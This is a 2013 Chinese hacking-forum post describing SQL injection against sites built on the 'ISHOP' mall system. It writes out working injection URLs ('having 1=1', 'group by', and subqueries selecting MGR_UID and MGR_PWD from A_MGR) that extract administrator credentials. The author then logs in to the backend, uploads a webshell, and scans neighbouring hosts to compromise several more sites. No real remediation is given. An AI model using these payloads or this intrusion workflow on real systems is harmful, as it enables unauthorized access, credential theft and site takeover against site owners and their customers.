找回密码
 立即注册
查看: 2876|回复: 0
打印 上一主题 下一主题

ISHOP商场建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:40:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
发现一个注入点
% j& N9 z/ i( c. shttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
* a3 W( K% r  D; |
" Y! n( q, N% W6 G5 A习惯性的加’having1=1--9 L  Q* _* X8 M, q% q+ A

) l1 l! @' P9 {1 K! ~5 {0 phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
, q; w% I8 |& T6 A+ t8 k) Y' u" a# [& h
0- O/ L5 m/ R* V) {! n5 [+ m
5 l/ O& Z& B1 r. G7 [5 w2 V
爆出Diary_A.dl_Title(这时候很激动啊)
1 V9 f4 M9 }) ]# O; P# M: x6 j' R5 m7 e+ _- u9 x3 ?
那么继续
, u$ e5 y# \: n0 C& l% F" ?$ _4 bhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
3 V  k9 ?$ z1 C! S$ R$ Z0 q# s
1 S' }1 F* C0 w% Q继续,一直爆下去
: A/ Y' `( _" I) Y4 @& m! {3 w4 Y
! C1 P/ {3 z) {( g爆到几个字段和表段 但是没找到需要的管理用户的字段
& x2 b# D% a' [6 I: b  s: u$ Y: X  r& B2 b" q/ p/ B) E% h
蛋疼了 怎么办 然后去后台登陆页看源码
: b: S" p9 D" d0 f' B5 `- ~; L2 M! S3 o. k4 g6 Q. p
0
2 k: d2 d: H0 G! v. h9 m9 \6 d5 ~, P& Y" f
Input name= “ADUID”
4 g! z1 ~- W6 w* z! @; w3 u9 WInput name= “ADPWD”
8 S2 i5 @8 L; ^
" Q! O4 ~' O1 ~* E+ d! o9 [& ]很幸运 找到了字段那就继续& `4 }& q  d2 a0 ?: k% Z
找到之后开始爆用户
$ z+ y  w# v& s: l4 S0 Ehttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—( u  N- y+ F6 R- {
爆密码
1 I7 b' o4 z: ?% k" ~http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—+ r! C- n" q4 ]0 ?; F2 h
测试了下 这个注入点只能爆到文章哪里的表 " E  B% z2 U% j. |  C

- f0 r" M$ `6 g1 \头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了9 s& R+ c. D5 ]- C- A; x- j
- H) Q* |" F5 O- E2 I7 F" _" ~4 a
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了& z4 |) U  w- w8 S
3 Q7 o/ Q( K& p& K; _9 w' B( _& K! c  n
473( ^7 G& i6 ~4 ?# g

) Q  v( o; U6 W; x: o: f; x进后台) X, S1 Y4 w" \3 I
3 I+ {: s  F3 x( f$ x+ ~, c) x. `
' a0 u5 x0 n8 E$ _
发现几个上传点 有的地方不能上传 而且防止恶意代码: i3 K8 V' S* U9 J) W# d3 [
- V  n6 R7 U5 Q; p3 o4 M
没办法 各种百度各种找大牛 找到一只好像可以突破的马+ Z! S% i7 P( O9 |

4 N' ^0 l* J! j* J" i2 I- h0 i7 ]$ e! K* o: ?) U1 P2 z; H: ~: I. u
在系统管理那里直接上传 不过没有显示地址: F2 h1 _: p# |9 o+ A. ~( z% x
+ y9 e/ V$ q' L9 I4 `1 j. b' l
再上传一次 抓包 搞定OK
3 L" }; a6 v" y5 S6 B0 a8 g" n1 w: o0 B

. x; G7 U" w- D& \# [3 x% \! }1 P8 ?" O. T- J7 A; U0 O
472/ F/ ]% O, i5 z  v$ X
6 I( |5 f3 V5 E0 q* r
晚上不行了 去睡觉。。。' D0 {% Y: |0 n! J8 Y
第二天刚起床 闲的没事做继续日站吧
* W& s) Z+ r5 N. |
' s; `) D% Y" |. Z8 G: C3 |找个站 就把这个站的旁c扫了下
' M5 C9 t- f9 ?! S: R- m4 V( a
$ P7 T& k7 Z, B* ]3 @  n发现c段也有一个购物站 ,然后还和这个站的模板差不多5 Q7 M7 ?0 K% ]; N) x/ [
$ |* v$ J8 ~  f* m% V+ ^
就找到会员登录口测试1 |4 j3 }2 ^9 @7 V$ k" i9 k
, P9 o  _! c8 J* x% W
'and (select top 1 MGR_UID from A_MGR)>0—8 d, _8 \5 Q! {. e
果断爆到了 这时候我很激动 通杀
8 ]! Z! X3 z# I& |! }+ @+ B( ~0 ^7 X0 r) B0 I. t5 C
再次翻c段
. O! n* Q# o- |9 d. U) r( C! Q  [$ q) b' [
翻出几个站 都成功拿下1 E3 ~! l8 S9 j3 p+ l- e

% Q: h) S; u' x: m
- _/ a9 `2 P2 d  H7 I2 x8 k. ^
, V- F8 O8 J; M# m" A修复方案:! N4 X$ L& X  ]$ U0 V6 T' u( R' v
他们比我专业
; `% K0 b! D+ [( p4 X& Q/ I
( U8 [6 p, P$ h7 p9 _# d6 R0 _5 Z# I# {, Z4 e! y

, r) u2 x+ P! L$ O
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表